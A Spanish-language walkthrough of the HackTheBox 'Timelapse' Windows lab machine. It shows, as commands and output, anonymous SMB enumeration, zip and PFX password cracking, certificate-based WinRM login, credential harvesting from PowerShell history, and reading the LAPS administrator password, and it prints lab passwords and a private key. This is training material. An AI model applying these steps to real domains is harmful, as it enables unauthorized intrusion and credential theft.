Timelapse es una de las maquinas existentes actualmente en la plataforma de hacking HackTheBox y es de dificultad Fácil.
En este caso se trata de una máquina basada en el Sistema Operativo Windows.
Índice
Escaneo de puertos
Como de costumbre, agregamos la IP de la máquina Timelapse 10.10.11.152 a /etc/hosts como timelapse.htb y comenzamos con el escaneo de puertos nmap.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 |
nmap -sV -sC -oA enumeration/nmap1 -Pn 10.10.11.152 Nmap scan report for 10.10.11.152 Host is up (0.046s latency). Not shown: 992 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 636/tcp open tcpwrapped 3269/tcp open tcpwrapped Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: 7h59m59s | smb2-security-mode: | 3.1.1: |_ Message signing enabled and required | smb2-time: | date: 2022-07-22T21:59:23 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Fri Jul 22 14:00:00 2022 -- 1 IP address (1 host up) scanned in 71.23 seconds |
Hacemos un primer escaneo y vemos varios puertos interesantes así que vamos a ver que podemos sacar de los mismos.
Enumeración
Empezamos enumerando el servicio de smb y podemos obtener el contenido sin necesidad de disponer de claves de acceso.
1 2 3 4 5 6 7 8 9 10 11 |
$ smbclient -L //10.10.11.152 -N Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC NETLOGON Disk Logon server share Shares Disk SYSVOL Disk Logon server share SMB1 disabled -- no workgroup available |
Tenemos acceso así que vamos a ver si podemos sacar algo más de alguno de los directorios y encontramos varios ficheros en el directorio Shares
1 2 3 4 5 6 7 8 9 10 |
$ smbclient //10.10.11.152/Shares/ Enter WORKGROUP\asdf's password: Try "help" to get a list of possible commands. smb: \> ls . D 0 Mon Oct 25 15:39:15 2021 .. D 0 Mon Oct 25 15:39:15 2021 Dev D 0 Mon Oct 25 19:40:06 2021 HelpDesk D 0 Mon Oct 25 15:48:42 2021 6367231 blocks of size 4096. 1293571 blocks available |
Así que revisamos cada directorio y nos descargamos su contenido para examinarlo más a fondo
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 |
smb: \> cd Dev smb: \Dev\> ls . D 0 Mon Oct 25 19:40:06 2021 .. D 0 Mon Oct 25 19:40:06 2021 winrm_backup.zip A 2611 Mon Oct 25 15:46:42 2021 get 6367231 blocks of size 4096. 1294022 blocks available smb: \Dev\> get winrm_backup.zip getting file \Dev\winrm_backup.zip of size 2611 as winrm_backup.zip (4,0 KiloBytes/sec) (average 4,0 KiloBytes/sec) smb: \Dev\> cd .. smb: \> ls . D 0 Mon Oct 25 15:39:15 2021 .. D 0 Mon Oct 25 15:39:15 2021 Dev D 0 Mon Oct 25 19:40:06 2021 HelpDesk D 0 Mon Oct 25 15:48:42 2021 cd 6367231 blocks of size 4096. 1292659 blocks available smb: \> cd HelpDesk smb: \HelpDesk\> ls . D 0 Mon Oct 25 15:48:42 2021 .. D 0 Mon Oct 25 15:48:42 2021 LAPS.x64.msi A 1118208 Mon Oct 25 14:57:50 2021 LAPS_Datasheet.docx A 104422 Mon Oct 25 14:57:46 2021 LAPS_OperationsGuide.docx A 641378 Mon Oct 25 14:57:40 2021 LAPS_TechnicalSpecification.docx A 72683 Mon Oct 25 14:57:44 2021 6367231 blocks of size 4096. 1291349 blocks available smb: \HelpDesk\> get LAPS.x64.msi getting file \HelpDesk\LAPS.x64.msi of size 1118208 as LAPS.x64.msi (1130,4 KiloBytes/sec) (average 680,7 KiloBytes/sec) smb: \HelpDesk\> get LAPS_Datasheet.docx getting file \HelpDesk\LAPS_Datasheet.docx of size 104422 as LAPS_Datasheet.docx (208,5 KiloBytes/sec) (average 570,6 KiloBytes/sec) smb: \HelpDesk\> get LAPS_OperationsGuide.docx getting file \HelpDesk\LAPS_OperationsGuide.docx of size 641378 as LAPS_OperationsGuide.docx (1038,7 KiloBytes/sec) (average 675,1 KiloBytes/sec) smb: \HelpDesk\> get LAPS_TechnicalSpecification.docx getting file \HelpDesk\LAPS_TechnicalSpecification.docx of size 72683 as LAPS_TechnicalSpecification.docx (114,1 KiloBytes/sec) (average 570,1 KiloBytes/sec) smb: \HelpDesk\> |
Revisamos en primer lugar el fichero zip, el cual contiene un fichero pfx
1 2 3 4 5 6 7 |
$ unzip -v winrm_backup.zip Archive: winrm_backup.zip Length Method Size Cmpr Date Time CRC-32 Name -------- ------ ------- ---- ---------- ----- -------- ---- 2555 Defl:N 2393 6% 2021-10-25 14:21 12ec5683 legacyy_dev_auth.pfx -------- ------- --- ------- 2555 2393 6% 1 file |
Si probamos a extraer el contenido está protegido por contraseña
1 2 3 4 |
$ unzip winrm_backup.zip Archive: winrm_backup.zip [winrm_backup.zip] legacyy_dev_auth.pfx password: skipping: legacyy_dev_auth.pfx incorrect password |
Así que utilizaremos fcrackzip para romper el cifrado y obtener la password
1 2 3 4 |
$ fcrackzip -D -u winrm_backup.zip -p /usr/share/wordlists/rockyou.txt PASSWORD FOUND!!!!: pw == supremelegacy |
Ha sido más fácil de lo que parecía así que extraemos el contenido
1 2 3 4 |
$ unzip winrm_backup.zip Archive: winrm_backup.zip [winrm_backup.zip] legacyy_dev_auth.pfx password: inflating: legacyy_dev_auth.pfx |
Pero ahora tenemos otro problema, y es que necesitamos otra password diferente para extraer la clave privada y el certificado del fichero pfx, utilizaremos en este caso john para obtener la password y poder extraer su contenido.
En primer lugar extraermos el hash del fichero con pfx2john
1 |
$ python3 /home/asdf/github/JohnTheRipper/run/pfx2john.py legacyy_dev_auth.pfx > legacyy_dev_auth.hash |
Y posteriormente utilizamos este hash para sacar su password
1 2 3 4 5 6 7 8 9 10 11 |
$ john -w=/usr/share/wordlists/rockyou.txt legacyy_dev_auth.hash --rule /usr/share/john/rules/rockyou-30000.rule Using default input encoding: UTF-8 Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x]) Cost 1 (iteration count) is 2000 for all loaded hashes Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status thuglegacy (legacyy_dev_auth.pfx) 1g 0:00:01:27 DONE (2022-07-22 14:23) 0.01138g/s 36785p/s 36785c/s 36785C/s thuglife06..thug211 Use the "--show" option to display all of the cracked passwords reliably Session completed. |
Ahora que ya tenemos la password vamos a extraer su contenido con openssl.
Extraemos la clave privada
1 |
$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out private.key -nodes |
Cuyo contenido es
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 |
Bag Attributes Microsoft Local Key set: <No Values> localKeyID: 01 00 00 00 friendlyName: te-4a534157-c8f1-4724-8db6-ed12f25c2a9b Microsoft CSP Name: Microsoft Software Key Storage Provider Key Attributes X509v3 Key Usage: 90 -----BEGIN PRIVATE KEY----- MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQClVgejYhZHHuLz TSOtYXHOi56zSocr9om854YDu/6qHBa4Nf8xFP6INNBNlYWvAxCvKM8aQsHpv3to pwpQ+YbRZDu1NxyhvfNNTRXjdFQV9nIiKkowOt6gG2F+9O5gVF4PAnHPm+YYPwsb oRkYV8QOpzIi6NMZgDCJrgISWZmUHqThybFW/7POme1gs6tiN1XFoPu1zNOYaIL3 dtZaazXcLw6IpTJRPJAWGttqyFommYrJqCzCSaWu9jG0p1hKK7mk6wvBSR8QfHW2 qX9+NbLKegCt+/jAa6u2V9lu+K3MC2NaSzOoIi5HLMjnrujRoCx3v6ZXL0KPCFzD MEqLFJHxAgMBAAECggEAc1JeYYe5IkJY6nuTtwuQ5hBc0ZHaVr/PswOKZnBqYRzW fAatyP5ry3WLFZKFfF0W9hXw3tBRkUkOOyDIAVMKxmKzguK+BdMIMZLjAZPSUr9j PJFizeFCB0sR5gvReT9fm/iIidaj16WhidQEPQZ6qf3U6qSbGd5f/KhyqXn1tWnL GNdwA0ZBYBRaURBOqEIFmpHbuWZCdis20CvzsLB+Q8LClVz4UkmPX1RTFnHTxJW0 Aos+JHMBRuLw57878BCdjL6DYYhdR4kiLlxLVbyXrP+4w8dOurRgxdYQ6iyL4UmU Ifvrqu8aUdTykJOVv6wWaw5xxH8A31nl/hWt50vEQQKBgQDYcwQvXaezwxnzu+zJ 7BtdnN6DJVthEQ+9jquVUbZWlAI/g2MKtkKkkD9rWZAK6u3LwGmDDCUrcHQBD0h7 tykwN9JTJhuXkkiS1eS3BiAumMrnKFM+wPodXi1+4wJk3YTWKPKLXo71KbLo+5NJ 2LUmvvPDyITQjsoZoGxLDZvLFwKBgQDDjA7YHQ+S3wYk+11q9M5iRR9bBXSbUZja 8LVecW5FDH4iTqWg7xq0uYnLZ01mIswiil53+5Rch5opDzFSaHeS2XNPf/Y//TnV 1+gIb3AICcTAb4bAngau5zm6VSNpYXUjThvrLv3poXezFtCWLEBKrWOxWRP4JegI ZnD1BfmQNwKBgEJYPtgl5Nl829+Roqrh7CFti+a29KN0D1cS/BTwzusKwwWkyB7o btTyQf4tnbE7AViKycyZVGtUNLp+bME/Cyj0c0t5SsvS0tvvJAPVpNejjc381kdN 71xBGcDi5ED2hVj/hBikCz2qYmR3eFYSTrRpo15HgC5NFjV0rrzyluZRAoGAL7s3 QF9Plt0jhdFpixr4aZpPvgsF3Ie9VOveiZAMh4Q2Ia+q1C6pCSYk0WaEyQKDa4b0 6jqZi0B6S71un5vqXAkCEYy9kf8AqAcMl0qEQSIJSaOvc8LfBMBiIe54N1fXnOeK /ww4ZFfKfQd7oLxqcRADvp1st2yhR7OhrN1pfl8CgYEAsJNjb8LdoSZKJZc0/F/r c2gFFK+MMnFncM752xpEtbUrtEULAKkhVMh6mAywIUWaYvpmbHDMPDIGqV7at2+X TTu+fiiJkAr+eTa/Sg3qLEOYgU0cSgWuZI0im3abbDtGlRt2Wga0/Igw9Ewzupc8 A5ZZvI+GsHhm0Oab7PEWlRY= -----END PRIVATE KEY----- |
Y después el certificado
1 |
$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out certificate.crt |
Cuyo contenido es
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 |
Bag Attributes localKeyID: 01 00 00 00 subject=CN = Legacyy issuer=CN = Legacyy -----BEGIN CERTIFICATE----- MIIDJjCCAg6gAwIBAgIQHZmJKYrPEbtBk6HP9E4S3zANBgkqhkiG9w0BAQsFADAS MRAwDgYDVQQDDAdMZWdhY3l5MB4XDTIxMTAyNTE0MDU1MloXDTMxMTAyNTE0MTU1 MlowEjEQMA4GA1UEAwwHTGVnYWN5eTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCC AQoCggEBAKVWB6NiFkce4vNNI61hcc6LnrNKhyv2ibznhgO7/qocFrg1/zEU/og0 0E2Vha8DEK8ozxpCwem/e2inClD5htFkO7U3HKG9801NFeN0VBX2ciIqSjA63qAb YX707mBUXg8Ccc+b5hg/CxuhGRhXxA6nMiLo0xmAMImuAhJZmZQepOHJsVb/s86Z 7WCzq2I3VcWg+7XM05hogvd21lprNdwvDoilMlE8kBYa22rIWiaZismoLMJJpa72 MbSnWEoruaTrC8FJHxB8dbapf341ssp6AK37+MBrq7ZX2W74rcwLY1pLM6giLkcs yOeu6NGgLHe/plcvQo8IXMMwSosUkfECAwEAAaN4MHYwDgYDVR0PAQH/BAQDAgWg MBMGA1UdJQQMMAoGCCsGAQUFBwMCMDAGA1UdEQQpMCegJQYKKwYBBAGCNxQCA6AX DBVsZWdhY3l5QHRpbWVsYXBzZS5odGIwHQYDVR0OBBYEFMzZDuSvIJ6wdSv9gZYe rC2xJVgZMA0GCSqGSIb3DQEBCwUAA4IBAQBfjvt2v94+/pb92nLIS4rna7CIKrqa m966H8kF6t7pHZPlEDZMr17u50kvTN1D4PtlCud9SaPsokSbKNoFgX1KNX5m72F0 3KCLImh1z4ltxsc6JgOgncCqdFfX3t0Ey3R7KGx6reLtvU4FZ+nhvlXTeJ/PAXc/ fwa2rfiPsfV51WTOYEzcgpngdHJtBqmuNw3tnEKmgMqp65KYzpKTvvM1JjhI5txG hqbdWbn2lS4wjGy3YGRZw6oM667GF13Vq2X3WHZK5NaP+5Kawd/J+Ms6riY0PDbh nx143vIioHYMiGCnKsHdWiMrG2UWLOoeUrlUmpr069kY/nn7+zSEa2pA -----END CERTIFICATE----- |
Ahora que ya tenemos el certificado y la clave privada, utilizamos los mismos para acceder a la máquina con evil-winrm
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
$ ruby /home/asdf/github/evil-winrm/evil-winrm.rb -S -k decrypt-private.key -c certificate.pem -i 10.10.11.152 Evil-WinRM shell v3.3 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Warning: SSL enabled Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\legacyy\Documents> whoami timelapse\legacyy *Evil-WinRM* PS C:\Users\legacyy\Documents> |
Obteniendo la flag de user
Ahora qe ya estamos dentro, nos vamos al escritorio del usuario para obtener nuestra flag
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
*Evil-WinRM* PS C:\Users\legacyy\Documents> cd .. *Evil-WinRM* PS C:\Users\legacyy> cd desktop *Evil-WinRM* PS C:\Users\legacyy\desktop> ls Directory: C:\Users\legacyy\desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 7/22/2022 2:26 PM 34 user.txt *Evil-WinRM* PS C:\Users\legacyy\desktop> type user.txt 7xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxb *Evil-WinRM* PS C:\Users\legacyy\desktop> |
Escalado de privilegios
Ahora el siguiente paso será escalar privilegios, para ello, entre otras cosas revisamos el usuario
1 2 3 4 5 6 7 8 |
*Evil-WinRM* PS C:\Users\legacyy\desktop> whoami /user USER INFORMATION ---------------- User Name SID ================= ============================================ timelapse\legacyy S-1-5-21-671920749-559770252-3318990721-1603 |
Los privilegios del mismo
1 2 3 4 5 6 7 8 9 10 11 |
*Evil-WinRM* PS C:\Users\legacyy\desktop> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======= SeMachineAccountPrivilege Add workstations to domain Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled *Evil-WinRM* PS C:\Users\legacyy\desktop> |
E información de red del usuario
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 |
*Evil-WinRM* PS C:\Users> net user legacyy User name legacyy Full Name Legacyy Comment User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 10/23/2021 12:17:10 PM Password expires Never Password changeable 10/24/2021 12:17:10 PM Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon 7/22/2022 3:29:40 PM Logon hours allowed All Local Group Memberships *Remote Management Use Global Group memberships *Domain Users *Development The command completed successfully. |
Pero no vemos nada importante así que lanzamos winpeas a ver si nos ayuda en algo y encontramos un fichero muy interesante, se trata del histórico de powershell del usuario, cuyo contenido es el siguiente
1 2 3 4 5 6 7 8 9 10 11 |
*Evil-WinRM* PS C:\users\legacyy\appdata\roaming\microsoft\windows\powershell\psreadline> type ConsoleHost_history.txt whoami ipconfig /all netstat -ano |select-string LIST $so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck $p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force $c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p) invoke-command -computername localhost -credential $c -port 5986 -usessl - SessionOption $so -scriptblock {whoami} get-aduser -filter * -properties * exit |
Revisando el fichero anterior vemos unas credenciales
1 |
svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV |
Pero vamos a aprovechar los comandos existentes en el fichero y vamos a lanzar los mismos, así que preparamos las variables en primer lugar
1 2 3 |
*Evil-WinRM* PS C:\users> $so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck *Evil-WinRM* PS C:\users> $p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force *Evil-WinRM* PS C:\users> $c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p) |
Y verificamos
1 2 |
*Evil-WinRM* PS C:\users> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami} timelapse\svc_deploy |
Vale, ha funcionado, pues vamos a obtener información de los privilegios del usuario
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 |
*Evil-WinRM* PS C:\users> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami /priv} PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======= SeMachineAccountPrivilege Add workstations to domain Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled *Evil-WinRM* PS C:\users> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {net user svc_deploy} User name svc_deploy Full Name svc_deploy Comment User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 10/25/2021 12:12:37 PM Password expires Never Password changeable 10/26/2021 12:12:37 PM Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon 7/22/2022 3:44:57 PM Logon hours allowed All Local Group Memberships *Remote Management Use Global Group memberships *LAPS_Readers *Domain Users The command completed successfully. |
Si nos fijamos atentamente, el usuario svc_deploy pertenece al grupo LAPS_Readers, lo que quiere decir que es capaz de obtener la password utilizada por el administrador local, conocido esto, vamos a tratar de obtener la misma.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 |
*Evil-WinRM* PS C:\users> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime} PSComputerName : localhost RunspaceId : ac25db9e-ba9f-45c0-810b-efc1e7477e1b DistinguishedName : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb DNSHostName : dc01.timelapse.htb Enabled : True ms-Mcs-AdmPwd : S6QY1oDB00ZB8.)8+Cc#]4m1 ms-Mcs-AdmPwdExpirationTime : 133034307686369127 Name : DC01 ObjectClass : computer ObjectGUID : 6e10b102-6936-41aa-bb98-bed624c9b98f SamAccountName : DC01$ SID : S-1-5-21-671920749-559770252-3318990721-1000 UserPrincipalName : PSComputerName : localhost RunspaceId : ac25db9e-ba9f-45c0-810b-efc1e7477e1b DistinguishedName : CN=DB01,OU=Database,OU=Servers,DC=timelapse,DC=htb DNSHostName : Enabled : True Name : DB01 ObjectClass : computer ObjectGUID : d38b3265-230f-47ae-bdcd-f7153da7659d SamAccountName : DB01$ SID : S-1-5-21-671920749-559770252-3318990721-1606 UserPrincipalName : PSComputerName : localhost RunspaceId : ac25db9e-ba9f-45c0-810b-efc1e7477e1b DistinguishedName : CN=DB01,OU=Database,OU=Servers,DC=timelapse,DC=htb DNSHostName : Enabled : True Name : DB01 ObjectClass : computer ObjectGUID : d38b3265-230f-47ae-bdcd-f7153da7659d SamAccountName : DB01$ SID : S-1-5-21-671920749-559770252-3318990721-1606 UserPrincipalName : PSComputerName : localhost RunspaceId : ac25db9e-ba9f-45c0-810b-efc1e7477e1b DistinguishedName : CN=WEB01,OU=Web,OU=Servers,DC=timelapse,DC=htb DNSHostName : Enabled : True Name : WEB01 ObjectClass : computer ObjectGUID : 897c7cfe-ba15-4181-8f2c-a74f88952683 SamAccountName : WEB01$ SID : S-1-5-21-671920749-559770252-3318990721-1607 UserPrincipalName : PSComputerName : localhost RunspaceId : ac25db9e-ba9f-45c0-810b-efc1e7477e1b DistinguishedName : CN=DEV01,OU=Dev,OU=Servers,DC=timelapse,DC=htb DNSHostName : Enabled : True Name : DEV01 ObjectClass : computer ObjectGUID : 02dc961a-7a60-4ec0-a151-0472768814ca SamAccountName : DEV01$ SID : S-1-5-21-671920749-559770252-3318990721-1608 UserPrincipalName : |
Así que ejecutamos el comando y obtenemos la password del administrador local, vamos a probar el acceso con evil-winrm.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
$ ruby /home/asdf/github/evil-winrm/evil-winrm.rb -S -u Administrator -p "S6QY1oDB00ZB8.)8+Cc#]4m1" -i 10.10.11.152 Evil-WinRM shell v3.3 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Warning: SSL enabled Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> whoami timelapse\administrator |
Obteniendo la flag de root
Ya somos admin, así que ahora vamos a obtener nuestra flag, pero para nuestra sorpresa, no está en el lugar habitual, revisamos la home de cada usuario y en este caso se encuentra en el escritorio del usuario TRX, y no en el del usuario administrator
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
*Evil-WinRM* PS C:\Users\TRX> ls desktop Directory: C:\Users\TRX\desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 7/22/2022 2:26 PM 34 root.txt *Evil-WinRM* PS C:\Users\TRX> type desktop/root.txt 7xxxxxxxxxxxxxxxxxxxxxxxxxxxxb *Evil-WinRM* PS C:\Users\TRX> |
Y ya tenemos nuestra flag de root para completar esta máquina y conseguir nuestros puntos.
Si eres usuario de HackTheBox y te gustó mi writeup, por favor, dame respeto en el siguiente enlace